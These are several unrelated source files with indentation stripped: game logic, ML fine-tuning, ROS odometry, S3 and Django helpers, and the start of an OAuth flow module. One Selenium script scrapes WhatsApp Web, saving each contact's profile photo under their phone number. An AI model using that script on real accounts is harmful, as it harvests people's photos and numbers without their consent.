log.debug(sf.log_info_data[-1])
log.debug("----------------------------------------------")
if self.pickle_store is not None:
# Pickle dictionary using protocol 0.
print('Pickle in file %s' % self.pickle_store)
self.pickle_write(sf, self.pickle_store, log)
json_content = self.write_summarize_output_json(sf, confirmatory_summary, derived_records, log,
recom_sentences, result, run_id, summarizer,
summary, self.pickle_store)
# write_to_file(json_content, path.normpath(path.expanduser(path.join(self.iobasedir, "tmp", "tmp.json"))))
else:
raise BaseException("You should tell which summarizer to use")
if sf is not None:
write_details_file([sf.log_info_data], path.join(self.iobasedir, "tmp", "tmp.csv"))
self.tlog.debug("SingleTopicRunner finished")
def write_continue_output_result(self,
sf,
unlabeled_data=None,
picklein=None,
pickleout=None,
summary=None,
summary_sentences=None,
exploratory_sentences=None):
log = logging.getLogger("SingleTopicRunner")
if self.out is not None:
derived_records = []
# construct table-like array of feedbacks per iteration.
for i, record in enumerate(sf.flight_recorder.records):
for accept in record.accept:
derived_records.append({
"iteration": i,
"concept": accept,
"value": "accept"
})
for reject in record.reject:
derived_records.append({
"iteration": i,
"concept": reject,
"value": "reject"
})
for implicit_reject in record.implicit_reject:
derived_records.append({
"iteration": i,
"concept": implicit_reject,
"value": "implicit_reject"
})
for item in unlabeled_data:
if item not in [i.get("concept", "") for i in derived_records]:
derived_records.append({
"iteration": -1,
"concept": item,
"value": "recommendation",
"weight": sf.summarizer.weights.get(item, 0.0),
"uncertainity": sf.svm_uncertainity.get(item, -1.0)
})
else:
log.info("recommendation included a already labeled instance, '%s'" % (item))
outputfilecontents = {
"picklein": picklein,
"pickleout": pickleout,
"summary": summary,
"confirmatory_summary": list(summary_sentences),
"exploratory_summary": list(exploratory_sentences),
"weights": sf.summarizer.weights,
"fbs_weights": dict(sf.feedbackstore.get_weights()),
"sentence_ids": list(summary_sentences),
"details": derived_records,
"score": sf.log_sir_info_data
}
write_to_file(json.dumps(outputfilecontents), self.out)
log.info("writing output to %s" % (self.out))
log.info("done writing output")
def write_summarize_output_json(self, sf, confirmatory_summary, derived_records, log, recom_sentences,
result, run_id, summarizer, summary, pickle_store=None):
# convert the sentences into a jsonizable structure:
sents = convert_to_json(sf.summarizer.sentences)
outputfilecontents = {
"picklein": None,
"pickleout": pickle_store,
"summary": summary,
"confirmatory_summary": list(confirmatory_summary),
"exploratory_summary": list(recom_sentences),
"type": summarizer,
"run_id": run_id,
"weights": sf.summarizer.weights,
"fbs_weights": dict(sf.feedbackstore.get_weights()),
"details": derived_records,
"sentences": list(sents),
"full": result,
"score": sf.log_sir_info_data
}
json_content = json.dumps(outputfilecontents)
if self.out is not None:
log.info("writing output to %s" % (self.out))
write_to_file(json_content, self.out)
return json_content
|
the-stack_106_14871
|
import random
from damage import Damage
from decorators import cast_spell
from entities import Character, Monster, CHARACTER_DEFAULT_EQUIPMENT
from heal import HolyHeal
from models.spells.loader import load_paladin_spells_for_level
from spells import PaladinSpell
class Paladin(Character):
"""
Paladin spells:
Spells every paladin starts with:
Seal of Righteousness
Deals X damage on each attack, needs to be activated first
"""
# TODO: Storing the spells here will be a problem if we ever want to have 2 simultaneous players or
# the ability to load another character without exiting the game.
learned_spells: {str: PaladinSpell} = {}
SOR_ACTIVE = False # Seal of Righteousness trigger
SOR_TURNS = 0 # Holds the remaining turns for SOR
KEY_FLASH_OF_LIGHT = "Flash of Light"
KEY_SEAL_OF_RIGHTEOUSNESS = "Seal of Righteousness"
KEY_MELTING_STRIKE = "Melting Strike"
def __init__(self, name: str, level: int = 1, health: int = 12, mana: int = 15, strength: int = 4,
loaded_scripts: set=set(), killed_monsters: set=set(), completed_quests: set=(),
saved_inventory: dict={"gold": 0}, saved_equipment: dict=CHARACTER_DEFAULT_EQUIPMENT):
super().__init__(name=name, level=level, health=health, mana=mana, strength=strength, loaded_scripts=loaded_scripts,
killed_monsters=killed_monsters, completed_quests=completed_quests,
saved_inventory=saved_inventory, saved_equipment=saved_equipment)
# TODO: Equip items AFTER level up
self.min_damage = 1
self.max_damage = 3
self._lookup_and_handle_new_spells()
def end_turn_update(self):
super().end_turn_update()
if self.SOR_TURNS == 0: # fade spell
self.SOR_ACTIVE = False
print(f'{self.KEY_SEAL_OF_RIGHTEOUSNESS} has faded from {self.name}')
def leave_combat(self):
super().leave_combat()
self.SOR_ACTIVE = False # Remove SOR aura
self.reset_spell_cooldowns()
def reset_spell_cooldowns(self):
"""
Resets the cooldown of every spell
Typically called when we leave combat
"""
for spell in self.learned_spells.values():
spell.reset_cd()
def _level_up(self, to_level: int=0, to_print: bool=True):
"""
This method levels the character up, if we're given a to_level we need to level up until we get to that level
"""
if to_level:
super()._level_up(to_level=to_level, to_print=to_print)
else:
super()._level_up(to_print=to_print)
self._lookup_and_handle_new_spells()
def _lookup_and_handle_new_spells(self):
"""
This method looks up all the new available spells to learn or update their ranks and does so
accordingly
"""
for available_spell in self._lookup_available_spells_to_learn(
self.level): # generator that returns dictionaries holding spell attributes
# update spell rank
if available_spell.name in self.learned_spells:
self.update_spell(available_spell)
# learn new spell
else:
self.learn_new_spell(spell=available_spell)
def learn_new_spell(self, spell: PaladinSpell):
print(f"You have learned a new spell - {spell.name}")
self.learned_spells[spell.name] = spell
def _lookup_available_spells_to_learn(self, level: int) -> [PaladinSpell]:
"""
Generator function yielding from a list of PaladinSpells that the character can learn
"""
yield from load_paladin_spells_for_level(level)
def update_spell(self, spell: PaladinSpell):
spell_name = spell.name
self.learned_spells[spell_name] = spell
print(f'Spell {spell.name} has been updated to rank {spell.rank}!')
print("*" * 20)
def spell_handler(self, command: str, target: Monster) -> bool:
"""
:param target: The target the spell is cast on
:param command: Command telling you which spell to use
:return: Returns a boolean indicating if the cast was successful or not
"""
if command == 'sor':
return self.spell_seal_of_righteousness(self.learned_spells[self.KEY_SEAL_OF_RIGHTEOUSNESS])
elif command == 'fol':
return self.spell_flash_of_light(self.learned_spells[self.KEY_FLASH_OF_LIGHT])
elif command == 'ms':
return self.spell_melting_strike(spell=self.learned_spells[self.KEY_MELTING_STRIKE], target=target)
print("Unsuccessful cast")
return False # if we do not go into any spell
@cast_spell
def spell_seal_of_righteousness(self, spell: PaladinSpell):
"""
When activated adds DAMAGE1 Spell Damage to each attack
Lasts for three turns
:return: boolean indicating if the cast was successful or not
"""
mana_cost = spell.mana_cost
self.mana -= mana_cost
self.SOR_ACTIVE = True
self.SOR_TURNS = 3
print(f'{self.name} activates {self.KEY_SEAL_OF_RIGHTEOUSNESS}!')
return True
def _spell_seal_of_righteousness_attack(self):
self.SOR_TURNS -= 1
return self.learned_spells[self.KEY_SEAL_OF_RIGHTEOUSNESS].damage1 # damage from SOR
@cast_spell
def spell_flash_of_light(self, spell):
"""
Heals the paladin for a certain amount
:return successful cast or not
"""
mana_cost = spell.mana_cost
heal = HolyHeal(heal_amount=spell.heal1)
self.health += heal
self.mana -= mana_cost
if self.health > self.max_health: # check for overheal
overheal = self._handle_overheal()
print(f'{spell.name} healed {self.name} for {heal-overheal:.2f} ({overheal:.2f} Overheal).')
else:
print(f'{spell.name} healed {self.name} for {heal}.')
return True
@cast_spell
def spell_melting_strike(self, spell: PaladinSpell, target: Monster):
""" Damages the enemy for DAMAGE_1 damage and puts a DoT effect, the index of which is EFFECT
:return successful cast or not"""
mana_cost: int = spell.mana_cost
damage: Damage = Damage(phys_dmg=spell.damage1)
dot: 'DoT' = spell.harmful_effect
dot.update_caster_level(self.level)
self.mana -= mana_cost
# damage the target and add the DoT
print(f'{spell.name} damages {target.name} for {damage}!')
target.take_attack(damage, self.level)
target.add_buff(dot)
return True
# SPELLS
def get_auto_attack_damage(self, target_level: int) -> (Damage, int):
level_difference = self.level - target_level
percentage_mod = (abs(level_difference) * 0.1) # calculates by how many % we're going to increase/decrease dmg
sor_damage = 0
damage_to_deal = random.randint(int(self.min_damage), int(self.max_damage))
if self.SOR_ACTIVE:
sor_damage = self._spell_seal_of_righteousness_attack()
# 10% more or less damage for each level that differs
if level_difference < 0: # monster is bigger level
damage_to_deal -= damage_to_deal * percentage_mod # -X%
sor_damage -= sor_damage * percentage_mod
elif level_difference > 0: # character is bigger level
damage_to_deal += damage_to_deal * percentage_mod # +X%
sor_damage += sor_damage * percentage_mod
return Damage(phys_dmg=damage_to_deal, magic_dmg=sor_damage), sor_damage
def attack(self, victim: Monster):
attacker_swing: (Damage, int) = self.get_auto_attack_damage(victim.level)
auto_attack: Damage = attacker_swing[0] # type: Damage
# the sor_damage below is used just to check for printing
sor_damage: int = attacker_swing[1] # if the seal isn't active the damage will be 0
auto_attack_print = victim.get_take_attack_damage_repr(auto_attack, self.level)
if sor_damage:
print(f'{self.name} attacks {victim.name} for {auto_attack_print} from {self.KEY_SEAL_OF_RIGHTEOUSNESS}!')
else:
print(f'{self.name} attacks {victim.name} for {auto_attack_print}!')
victim.take_attack(auto_attack, self.level)
def get_class(self):
"""
Return the class name in lowercase.
Ex: paladin
"""
return self.__class__.__name__.lower()
|
the-stack_106_14874
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import TimeoutException
import base64
import time
import os
from datetime import datetime
from pathlib import Path
# Chrome driver yoluu tam girin
# isterseniz en güncel sürümü buradan indirebilirsiniz : https://chromedriver.chromium.org/
driverLocation = Path(__file__).parent / "chromedrivers/linux/chromedriver"
class Scraper:
def __init__(self):
chrome_options = Options()
chrome_options.add_argument("--window-size=1920x1080")
chrome_options.add_argument("user-data-dir=~/Library/Application Support/Google/Chrome/Default/Cookies")
self.driver = webdriver.Chrome(driverLocation)
print("Whattsapp ekranı açılıyor ")
self.driver.get('https://web.whatsapp.com')
print("QR kodu okutup giriş yaptıktan sonra \"Yeni sohbet\" tuşuna basıp Enter' a basın ")
input()
def scrapeImages(self, name):
try:
contact_name = name
try:
contact = self.driver.find_element_by_xpath("//span[@title=\"" + contact_name + "\"]")
except:
print("İsim listede yok gibi arama kutusu deneniyor")
search_box_xpath = '//div[@class="_1awRl copyable-text selectable-text"][@contenteditable="true"][@data-tab="3"]'
search_box = WebDriverWait(self.driver, 50).until(
lambda driver: self.driver.find_element_by_xpath(search_box_xpath))
search_box.click()
search_box.send_keys(contact_name)
time.sleep(2)
contact = self.driver.find_element_by_xpath("//span[@title=\"" + contact_name + "\"]")
contact.click()
print("Kişi Bulundu")
menu = self.driver.find_element_by_xpath("(//div[@title=\"Diğer seçenekler\"])[2]")
menu.click()
time.sleep(2)
try:
info = self.driver.find_element_by_xpath("//div[@title=\"Kişi bilgisi\"]")
except:
info = self.driver.find_element_by_xpath("//div[@title=\"Grup bilgisi\"]")
info.click()
time.sleep(1)
numara = self.driver.find_element_by_xpath('//*[@id="app"]/div/div/div[2]/div[3]/span/div/span/div/div/div[1]/div[4]/div[3]/div/div/span/span').text
print ("Kişi Numarası: "+numara)
print("==================Resim Kaydı Deneniyor====================")
while True:
try:
image_xpath = '//img[@class="_3t3gU rlUm6 _1VzZY"]'
image = WebDriverWait(self.driver, 20).until(
lambda driver: self.driver.find_element_by_xpath(image_xpath))
image_src = image.get_attribute("src")
image_name = image_src.rsplit('/', 1)[
1]
result = self.driver.execute_async_script("""
var uri = arguments[0];
var callback = arguments[1];
var toBase64 = function(buffer){for(var r,n=new Uint8Array(buffer),t=n.length,a=new Uint8Array(4*Math.ceil(t/3)),i=new Uint8Array(64),o=0,c=0;64>c;++c)i[c]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".charCodeAt(c);for(c=0;t-t%3>c;c+=3,o+=4)r=n[c]<<16|n[c+1]<<8|n[c+2],a[o]=i[r>>18],a[o+1]=i[r>>12&63],a[o+2]=i[r>>6&63],a[o+3]=i[63&r];return t%3===1?(r=n[t-1],a[o]=i[r>>2],a[o+1]=i[r<<4&63],a[o+2]=61,a[o+3]=61):t%3===2&&(r=(n[t-2]<<8)+n[t-1],a[o]=i[r>>10],a[o+1]=i[r>>4&63],a[o+2]=i[r<<2&63],a[o+3]=61),new TextDecoder("ascii").decode(a)};
var xhr = new XMLHttpRequest();
xhr.responseType = 'arraybuffer';
xhr.onload = function(){ callback(toBase64(xhr.response)) };
xhr.onerror = function(){ callback(xhr.status) };
xhr.open('GET', uri);
xhr.send();
""", image_src)
if type(result) == int:
raise Exception("İstek Reddedildi %s" % result)
final_image = base64.b64decode(result)
filename = 'images/' +numara.strip("+").strip()+ '.jpg' # I assume you have a way of picking unique filenames
with open(filename, 'wb') as f:
f.write(final_image)
print("Kaydediliyor " + filename + "")
close_image_button = self.driver.find_element_by_xpath('//div[@title="Yeni sohbet"]')
close_image_button.click()
except Exception as e:
try:
close_image_button = self.driver.find_element_by_xpath('//div[@title="Yeni sohbet"]')
close_image_button.click()
except Exception as err:
print("")
break
except Exception as e:
print(e)
self.driver.quit()
def quitDriver(self):
print("Quit")
self.driver.quit()
os.system('clear')
print ("""
TR Whatsapp profil potoğrafı kaydedici
) ( (
( /( ( ) )\ ) )\ )
)\()) )\ ) ( (()/( (()/(
((_)\ (()/( )\ '/(_)) ((_))
| |(_) )(_)) _((_))(_) _| _| |
| '_ \| || || ' \()| _|/ _` |
|_.__/ \_, ||_|_|_| |_| \__,_|
|__/
""")
scraper = Scraper()
isimler = ["Aa", "Yusuf"]
for i in isimler:
print("===================Yeni Kişi Deneniyor=================")
scraper.scrapeImages(i)
|
the-stack_106_14876
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Fine-tuning the library models for question-answering."""
import logging
import os
import sys
from dataclasses import dataclass, field
from typing import Optional
from transformers import AutoConfig, AutoModelForQuestionAnswering, AutoTokenizer, HfArgumentParser, SquadDataset
from transformers import SquadDataTrainingArguments as DataTrainingArguments
from transformers import Trainer, TrainingArguments
logger = logging.getLogger(__name__)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
use_fast: bool = field(default=False, metadata={"help": "Set this flag to use fast tokenization."})
# If you want to tweak more attributes on your tokenizer, you should do it in a distinct script,
# or just modify its tokenizer_config.json.
cache_dir: Optional[str] = field(
default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from s3"}
)
def main():
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
if (
os.path.exists(training_args.output_dir)
and os.listdir(training_args.output_dir)
and training_args.do_train
and not training_args.overwrite_output_dir
):
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. Use --overwrite_output_dir to overcome."
)
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO if training_args.local_rank in [-1, 0] else logging.WARN,
)
logger.warning(
"Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s",
training_args.local_rank,
training_args.device,
training_args.n_gpu,
bool(training_args.local_rank != -1),
training_args.fp16,
)
logger.info("Training/evaluation parameters %s", training_args)
# Prepare Question-Answering task
# Load pretrained model and tokenizer
#
# Distributed training:
# The .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
config = AutoConfig.from_pretrained(
model_args.config_name if model_args.config_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
)
tokenizer = AutoTokenizer.from_pretrained(
model_args.tokenizer_name if model_args.tokenizer_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
)
model = AutoModelForQuestionAnswering.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
)
# Get datasets
is_language_sensitive = hasattr(model.config, "lang2id")
train_dataset = (
SquadDataset(
data_args, tokenizer=tokenizer, is_language_sensitive=is_language_sensitive, cache_dir=model_args.cache_dir
)
if training_args.do_train
else None
)
eval_dataset = (
SquadDataset(
data_args,
tokenizer=tokenizer,
mode="dev",
is_language_sensitive=is_language_sensitive,
cache_dir=model_args.cache_dir,
)
if training_args.do_eval
else None
)
# Initialize our Trainer
trainer = Trainer(model=model, args=training_args, train_dataset=train_dataset, eval_dataset=eval_dataset,)
# Training
if training_args.do_train:
trainer.train(
model_path=model_args.model_name_or_path if os.path.isdir(model_args.model_name_or_path) else None
)
trainer.save_model()
# For convenience, we also re-save the tokenizer to the same directory,
# so that you can share your model easily on huggingface.co/models =)
if trainer.is_world_master():
tokenizer.save_pretrained(training_args.output_dir)
def _mp_fn(index):
# For xla_spawn (TPUs)
main()
if __name__ == "__main__":
main()
|
the-stack_106_14878
|
from django.http import HttpResponseNotFound
from .logging import logger
from .registry import registry
def router(request, name: str, *args, **kwargs):
try:
view = registry[name]
except KeyError:
logger.debug('Resolving "%s"...' % name)
return HttpResponseNotFound()
else:
return view(request, *args, **kwargs)
|
the-stack_106_14879
|
from types import SimpleNamespace
from fnmatch import fnmatch
from itertools import takewhile
def s3_file_info(f, bucket):
url = "s3://{}/{}".format(bucket, f.get("Key"))
return SimpleNamespace(
url=url,
size=f.get("Size"),
last_modified=f.get("LastModified"),
etag=f.get("ETag"),
)
def norm_predicate(pred=None, glob=None):
def glob_predicate(glob, pred):
if pred is None:
return lambda f: fnmatch(f.url, glob)
else:
return lambda f: fnmatch(f.url, glob) and pred(f)
if glob is not None:
return glob_predicate(glob, pred)
return pred
def parse_query(url_query):
"""
- s3://bucket/some/path/
- s3://bucket/some/path/something
- s3://bucket/some/path/*/*/
- s3://bucket/some/path/*/*/file.yaml
- s3://bucket/some/path/*/*/*.yaml
- s3://bucket/some/path/**/file.yaml
"""
glob_set = set("*[]?")
def is_glob(s):
return bool(glob_set.intersection(set(s)))
pp = url_query.split("/")
base = list(takewhile(lambda s: not is_glob(s), pp))
qq = pp[len(base) :]
glob, _file, depth = None, None, None
if len(qq) > 0:
last = qq.pop()
if is_glob(last):
glob = last
elif last != "":
_file = last
qq_set = set(qq)
if len(qq) == 0:
depth = 0
elif qq_set == {"**"}:
depth = -1
elif "**" not in qq_set:
depth = len(qq)
else:
raise ValueError("Bad query: %s" % url_query)
base = "/".join(base)
base = base.rstrip("/") + "/"
return SimpleNamespace(base=base, depth=depth, file=_file, glob=glob)
|
the-stack_106_14881
|
from __future__ import print_function
import threading
import rospy
from roboclaw_driver.msg import Stats
from b2_logic.odometry_helpers import yaw_from_odom_message
from b2_logic.base_functions import (
calc_create_speed_cmd,
calc_base_frame_velocity_from_encoder_diffs,
calc_odometry_from_base_velocity
)
class BaseNode:
def __init__(self, wheel_dist, wheel_radius, ticks_per_rotation,
max_drive_secs, deadman_secs, max_qpps, max_accel,
base_frame_id, world_frame_id,
speed_cmd_pub, odom_pub, tf_broadcaster):
self._wheel_dist = wheel_dist
self._wheel_radius = wheel_radius
self._ticks_per_rotation = ticks_per_rotation
self._max_drive_secs = max_drive_secs
self._deadman_secs = deadman_secs
self._max_qpps = max_qpps
self._max_accel = max_accel
self._base_frame_id = base_frame_id
self._world_frame_id = world_frame_id
self._speed_cmd_pub = speed_cmd_pub
self._odom_pub = odom_pub
self._tf_broadcaster = tf_broadcaster
# Init Twist command state
self._x_linear_cmd = 0.0
self._z_angular_cmd = 0.0
# Last time we received a Twist message from the Pilot
# If we don't get a message after deadman_secs, we stop the base
self._last_cmd_vel_time = None # type: rospy.Time
# Init Odometry state
self._world_x = 0.0
self._world_y = 0.0
self._world_theta = 0.0
self._last_odom_time = None # type: rospy.Time
# Init Roboclaw stats state
self._roboclaw_front_stats = None # type: Stats
self._roboclaw_rear_stats = None # type: Stats
# Roboclaw encoder state
self._m1_front_enc_prev = 0
self._m2_front_enc_prev = 0
self._m1_rear_enc_prev = 0
self._m2_rear_enc_prev = 0
self._stats_lock = threading.RLock() # To serialize access to the qpps stats
self._cmd_vel_lock = threading.RLock() # To serialize access to x/z command variables
def run(self, loop_hz):
"""Runs the main loop of the node.
Sends motor commands, and publishes odometry.
"""
rospy.logdebug("Running node")
looprate = rospy.Rate(loop_hz)
# Set initial states
if self._roboclaw_front_stats is not None:
self._m1_front_enc_prev = self._roboclaw_front_stats.m1_enc_val
self._m2_front_enc_prev = self._roboclaw_front_stats.m2_enc_val
if self._roboclaw_rear_stats is not None:
self._m1_rear_enc_prev = self._roboclaw_rear_stats.m1_enc_val
self._m2_rear_enc_prev = self._roboclaw_rear_stats.m2_enc_val
self._last_odom_time = rospy.get_rostime()
try:
while not rospy.is_shutdown():
self.process_base_loop()
looprate.sleep()
except rospy.ROSInterruptException:
rospy.logwarn("ROSInterruptException received in main loop")
def cmd_vel_callback(self, msg):
"""Called by the Twist cmd_vel message subscriber.
Parameters:
:param Twist msg: Twist command velocity message
"""
with self._cmd_vel_lock:
self._x_linear_cmd = msg.linear.x
self._z_angular_cmd = msg.angular.z
self._last_cmd_vel_time = rospy.get_rostime()
rospy.logdebug("CMD Vel - X: {} | Z: {}".format(msg.linear.x, msg.angular.z))
def roboclaw_stats_callback(self, stats, callback_args):
"""Called by the Roboclaw Stats message subscriber
Parameters:
:param Stats stats: Roboclaw Stats message
:parmm list callback_args: Arguments to this function (i.e. "front" or "rear)
"""
with self._stats_lock:
if "front" in callback_args:
self._roboclaw_front_stats = stats
elif "rear" in callback_args:
self._roboclaw_rear_stats = stats
else:
rospy.logwarn("roboclaw_stats_callback: Unsure which stats to read")
rospy.logwarn("callback_args: {}".format(callback_args))
def process_base_loop(self):
# If the last command was over 1 sec ago, stop the base
if (
self._last_cmd_vel_time is None or
(rospy.get_rostime() - self._last_cmd_vel_time).to_sec() > self._deadman_secs
):
self._x_linear_cmd = 0.0
self._z_angular_cmd = 0.0
# ---------------------------------
# Calculate and send motor commands
# ---------------------------------
with self._cmd_vel_lock:
x_linear_cmd = self._x_linear_cmd
z_angular_cmd = self._z_angular_cmd
cmd = calc_create_speed_cmd(
x_linear_cmd, z_angular_cmd,
self._wheel_dist, self._wheel_radius,
self._ticks_per_rotation, self._max_drive_secs, self._max_qpps, self._max_accel
)
self._speed_cmd_pub.publish(cmd)
# -------------------------------
# Calculate and publish Odometry
# -------------------------------
if self._roboclaw_front_stats is None or self._roboclaw_rear_stats is None:
rospy.loginfo("Insufficient roboclaw stats received, skipping odometry calculation")
return
with self._stats_lock:
# Calculate change in encoder readings
m1_front_enc_diff = self._roboclaw_front_stats.m1_enc_val - self._m1_front_enc_prev
m2_front_enc_diff = self._roboclaw_front_stats.m2_enc_val - self._m2_front_enc_prev
m1_rear_enc_diff = self._roboclaw_rear_stats.m1_enc_val - self._m1_rear_enc_prev
m2_rear_enc_diff = self._roboclaw_rear_stats.m2_enc_val - self._m2_rear_enc_prev
self._m1_front_enc_prev = self._roboclaw_front_stats.m1_enc_val
self._m2_front_enc_prev = self._roboclaw_front_stats.m2_enc_val
self._m1_rear_enc_prev = self._roboclaw_rear_stats.m1_enc_val
self._m2_rear_enc_prev = self._roboclaw_rear_stats.m2_enc_val
# Since we have a two Roboclaw robot, take the average of the encoder diffs
# from each Roboclaw for each side.
m1_enc_diff = (m1_front_enc_diff + m1_rear_enc_diff) / 2
m2_enc_diff = (m2_front_enc_diff + m2_rear_enc_diff) / 2
# We take the nowtime from the Stats message so it matches the encoder values.
# Otherwise we would get timing variances based on when the loop runs compared to
# when the stats were measured..
# Since we have a two Roboclaw robot, take the latest stats timestamp from either
# Roboclaw.
front_stamp = self._roboclaw_front_stats.header.stamp
rear_stamp = self._roboclaw_rear_stats.header.stamp
nowtime = max(front_stamp, rear_stamp)
x_linear_v, y_linear_v, z_angular_v = calc_base_frame_velocity_from_encoder_diffs(
m1_enc_diff, m2_enc_diff,
self._ticks_per_rotation, self._wheel_radius, self._wheel_dist,
self._last_odom_time, nowtime
)
time_delta_secs = (nowtime - self._last_odom_time).to_sec()
self._last_odom_time = nowtime
odom = calc_odometry_from_base_velocity(
x_linear_v, y_linear_v, z_angular_v,
self._world_x, self._world_y, self._world_theta,
time_delta_secs, nowtime,
self._base_frame_id, self._world_frame_id
)
self._odom_pub.publish(odom)
# -----------------------------------------
# Calculate and broacast tf transformation
# -----------------------------------------
self._world_x = odom.pose.pose.position.x
self._world_y = odom.pose.pose.position.y
self._world_theta = yaw_from_odom_message(odom)
quat = odom.pose.pose.orientation
self._tf_broadcaster.sendTransform(
(self._world_x, self._world_y, 0),
(quat.x, quat.y, quat.z, quat.w),
nowtime,
self._base_frame_id,
self._world_frame_id
)
self._last_odom_time = nowtime
rospy.logdebug(
"World position: [{}, {}] heading: {}".format(
self._world_x, self._world_y, self._world_theta))
rospy.logdebug(
"Forward speed: {}, Turn speed: {}".format(
self._x_linear_cmd, self._z_angular_cmd))
|
the-stack_106_14882
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""OAuth 2.0 Authorization Flow
This module provides integration with `requests-oauthlib`_ for running the
`OAuth 2.0 Authorization Flow`_ and acquiring user credentials.
Here's an example of using :class:`Flow` with the installed application
authorization flow::
from google_auth_oauthlib.flow import Flow
# Create the flow using the client secrets file from the Google API
# Console.
flow = Flow.from_client_secrets_file(
'path/to/client_secrets.json',
scopes=['profile', 'email'],
redirect_uri='urn:ietf:wg:oauth:2.0:oob')
# Tell the user to go to the authorization URL.
auth_url, _ = flow.authorization_url(prompt='consent')
print('Please go to this URL: {}'.format(auth_url))
# The user will get an authorization code. This code is used to get the
# access token.
code = input('Enter the authorization code: ')
flow.fetch_token(code=code)
# You can use flow.credentials, or you can just get a requests session
# using flow.authorized_session.
session = flow.authorized_session()
print(session.get('https://www.googleapis.com/userinfo/v2/me').json())
This particular flow can be handled entirely by using
:class:`InstalledAppFlow`.
.. _requests-oauthlib: http://requests-oauthlib.readthedocs.io/en/stable/
.. _OAuth 2.0 Authorization Flow:
https://tools.ietf.org/html/rfc6749#section-1.2
"""
from base64 import urlsafe_b64encode
import hashlib
import json
import logging
try:
from secrets import SystemRandom
except ImportError: # pragma: NO COVER
from random import SystemRandom
from string import ascii_letters, digits
import webbrowser
import wsgiref.simple_server
import wsgiref.util
import google.auth.transport.requests
import google.oauth2.credentials
import google_auth_oauthlib.helpers
_LOGGER = logging.getLogger(__name__)
class Flow(object):
"""OAuth 2.0 Authorization Flow
This class uses a :class:`requests_oauthlib.OAuth2Session` instance at
:attr:`oauth2session` to perform all of the OAuth 2.0 logic. This class
just provides convenience methods and sane defaults for doing Google's
particular flavors of OAuth 2.0.
Typically you'll construct an instance of this flow using
:meth:`from_client_secrets_file` and a `client secrets file`_ obtained
from the `Google API Console`_.
.. _client secrets file:
https://developers.google.com/identity/protocols/oauth2/web-server
#creatingcred
.. _Google API Console:
https://console.developers.google.com/apis/credentials
"""
def __init__(
self,
oauth2session,
client_type,
client_config,
redirect_uri=None,
code_verifier=None,
autogenerate_code_verifier=False,
):
"""
Args:
oauth2session (requests_oauthlib.OAuth2Session):
The OAuth 2.0 session from ``requests-oauthlib``.
client_type (str): The client type, either ``web`` or
``installed``.
client_config (Mapping[str, Any]): The client
configuration in the Google `client secrets`_ format.
redirect_uri (str): The OAuth 2.0 redirect URI if known at flow
creation time. Otherwise, it will need to be set using
:attr:`redirect_uri`.
code_verifier (str): random string of 43-128 chars used to verify
the key exchange.using PKCE.
autogenerate_code_verifier (bool): If true, auto-generate a
code_verifier.
.. _client secrets:
https://github.com/googleapis/google-api-python-client/blob
/main/docs/client-secrets.md
"""
self.client_type = client_type
"""str: The client type, either ``'web'`` or ``'installed'``"""
self.client_config = client_config[client_type]
"""Mapping[str, Any]: The OAuth 2.0 client configuration."""
self.oauth2session = oauth2session
"""requests_oauthlib.OAuth2Session: The OAuth 2.0 session."""
self.redirect_uri = redirect_uri
self.code_verifier = code_verifier
self.autogenerate_code_verifier = autogenerate_code_verifier
@classmethod
def from_client_config(cls, client_config, scopes, **kwargs):
"""Creates a :class:`requests_oauthlib.OAuth2Session` from client
configuration loaded from a Google-format client secrets file.
Args:
client_config (Mapping[str, Any]): The client
configuration in the Google `client secrets`_ format.
scopes (Sequence[str]): The list of scopes to request during the
flow.
kwargs: Any additional parameters passed to
:class:`requests_oauthlib.OAuth2Session`
Returns:
Flow: The constructed Flow instance.
Raises:
